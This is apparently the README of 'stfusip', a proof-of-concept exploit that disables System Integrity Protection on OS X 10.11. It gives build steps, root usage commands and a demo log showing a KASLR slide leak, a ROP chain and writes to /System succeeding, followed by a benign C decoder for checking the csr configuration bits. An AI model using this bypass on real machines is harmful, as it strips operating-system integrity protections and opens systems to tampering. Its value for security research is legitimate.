stfusip

by jndok


System Integrity Protection (SIP) bypass for OSX 10.11.1 - 10.11.2 - 10.11.3


stfusip

credits & thanks

  • jndok – a.k.a. myself, for code and exploit.
  • qwertyoruiop – for bug and related help! go follow him on Twitter :)

compile

Simply do `make` inside the `stfusip` folder. If you encounter linking problems, be sure to check that you have capstone installed on your system. There is a flag inside the `Makefile` to specify capstone's `include` directory; be sure to edit it if capstone is located elsewhere on your system!

If you don't have capstone installed, do:

brew install capstone

and you should be set.

usage

So, `stfusip` is a simple PoC for disabling/enabling SIP, a.k.a. System Integrity Protection, a.k.a. rootless, on OSX 10.11.1. Bug could theoretically still work on 10.11.2, but I am really not sure.

Super easy to use, but it needs to be run as root:

sudo ./stfusip disable   # this disables SIP
sudo ./stfusip enable    # this enables SIP

Here's a demo output:

jndoks-Mac-Pro:stfusip jndok$ sudo su
sh-3.2# whoami
root
sh-3.2# touch /System/yolo
touch: /System/yolo: Operation not permitted
sh-3.2# ./stfusip disable
[+] kaslr slide is: 0x0000000c600000
[+] built ROP chain @ 0xbff56c90 (mapped @ 0x261)!
[+] trigger set: 0x18 : 0xffffff800c8c41bf

[-] System Integrity Protection (SIP) has been disabled.
sh-3.2# touch /System/yolo
sh-3.2# ls -ls /System/
total 0
0 drwxr-xr-x 74 root wheel 2516 Dec 7 09:43 Library
0 -rw-r--r-- 1 root wheel 0 Dec 7 15:46 yolo
sh-3.2# rm -rf /System/yolo
sh-3.2# ls -ls /System/
total 0
0 drwxr-xr-x 74 root wheel 2516 Dec 7 09:43 Library
sh-3.2# ./stfusip enable
[+] kaslr slide is: 0x0000000c600000
[+] built ROP chain @ 0xbfff6c90 (mapped @ 0x261)!
[+] trigger set: 0x18 : 0xffffff800c8c41bf

touch: /System/test: Operation not permitted
[+] System Integrity Protection (SIP) has been enabled.
sh-3.2# touch /System/yolo
touch: /System/yolo: Operation not permitted
sh-3.2# exit
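As an added check (example code written for this page, not part of stfusip): before and after running the tool you can read the kernel's active csr configuration instead of relying only on `touch`. On OS X 10.11 and later that is `csr_get_active_config()` from `<sys/csr.h>`; the flag names and values below are assumed to match xnu's `bsd/sys/csr.h` and are reproduced for non-Apple builds so the decoder compiles and runs anywhere. Whether stfusip's in-kernel patch is visible through this interface depends on what it patches, which the page does not say, so the `touch /System/...` test in the demo above remains the ground truth for the filesystem restriction.

```c
/* Added example (not stfusip code): decode the SIP / csr configuration bitmask.
 * On OS X 10.11+ the active config is read with csr_get_active_config() from
 * <sys/csr.h>. Off-box, the flag values are assumed to match xnu's
 * bsd/sys/csr.h and are reproduced so the decoder compiles and runs anywhere. */
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#ifdef __APPLE__
#include <sys/csr.h>
#else
typedef uint32_t csr_config_t;
#define CSR_ALLOW_UNTRUSTED_KEXTS      (1u << 0)
#define CSR_ALLOW_UNRESTRICTED_FS      (1u << 1)
#define CSR_ALLOW_TASK_FOR_PID         (1u << 2)
#define CSR_ALLOW_KERNEL_DEBUGGER      (1u << 3)
#define CSR_ALLOW_APPLE_INTERNAL       (1u << 4)
#define CSR_ALLOW_UNRESTRICTED_DTRACE  (1u << 5)
#define CSR_ALLOW_UNRESTRICTED_NVRAM   (1u << 6)
#endif

struct csr_flag { csr_config_t bit; const char *name; };

/* One entry per restriction that a set bit lifts. */
static const struct csr_flag csr_flags[] = {
    { CSR_ALLOW_UNTRUSTED_KEXTS,     "untrusted kexts allowed" },
    { CSR_ALLOW_UNRESTRICTED_FS,     "filesystem protections off" },
    { CSR_ALLOW_TASK_FOR_PID,        "task_for_pid allowed" },
    { CSR_ALLOW_KERNEL_DEBUGGER,     "kernel debugger allowed" },
    { CSR_ALLOW_APPLE_INTERNAL,      "apple internal" },
    { CSR_ALLOW_UNRESTRICTED_DTRACE, "dtrace unrestricted" },
    { CSR_ALLOW_UNRESTRICTED_NVRAM,  "nvram unrestricted" },
};
#define CSR_FLAG_COUNT (sizeof csr_flags / sizeof csr_flags[0])

/* The bit that governs the /System writes exercised by the demo above. */
int sip_fs_protection_off(csr_config_t cfg)
{
    return (cfg & CSR_ALLOW_UNRESTRICTED_FS) != 0;
}

/* How many of the known restrictions cfg lifts. */
int sip_lifted_count(csr_config_t cfg)
{
    int n = 0;
    for (size_t i = 0; i < CSR_FLAG_COUNT; i++)
        if (cfg & csr_flags[i].bit) n++;
    return n;
}

/* Bits set in cfg that this decoder does not know about (a newer OS, or a
 * patch that wrote something odd into the config); non-zero means look closer. */
csr_config_t sip_unknown_bits(csr_config_t cfg)
{
    csr_config_t known = 0;
    for (size_t i = 0; i < CSR_FLAG_COUNT; i++) known |= csr_flags[i].bit;
    return cfg & ~known;
}

/* Human-readable summary of cfg in buf; returns the length of the string written. */
size_t sip_describe(csr_config_t cfg, char *buf, size_t len)
{
    size_t pos = 0;
    if (len == 0) return 0;
    buf[0] = '\0';
    for (size_t i = 0; i < CSR_FLAG_COUNT; i++) {
        if (!(cfg & csr_flags[i].bit)) continue;
        int n = snprintf(buf + pos, len - pos, "%s%s", pos ? ", " : "", csr_flags[i].name);
        if (n < 0 || (size_t)n >= len - pos) break;   /* truncated: keep what fits */
        pos += (size_t)n;
    }
    if (pos == 0) snprintf(buf, len, "all restrictions enforced");
    return strlen(buf);
}

int main(void)
{
    csr_config_t cfg = 0;
#ifdef __APPLE__
    if (csr_get_active_config(&cfg) != 0) {   /* assumption: returns 0 on success */
        fprintf(stderr, "csr_get_active_config: %s\n", strerror(errno));
        return 1;
    }
#else
    /* Constructed sample: the config a filesystem-only bypass would present. */
    cfg = CSR_ALLOW_UNRESTRICTED_FS;
#endif
    char buf[256];
    sip_describe(cfg, buf, sizeof buf);
    printf("csr config 0x%08x: %s\n", (unsigned)cfg, buf);
    printf("/System writable per csr bits: %s\n", sip_fs_protection_off(cfg) ? "yes" : "no");
    if (sip_unknown_bits(cfg))
        printf("unknown bits set: 0x%08x\n", (unsigned)sip_unknown_bits(cfg));
    return 0;
}
```

Run it once as root before `./stfusip disable` and once after: if the reported bits do not change while `touch /System/yolo` starts succeeding, the tool is patching something other than the csr config the syscall reports, which is worth knowing before you trust `csrutil status` on that box.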
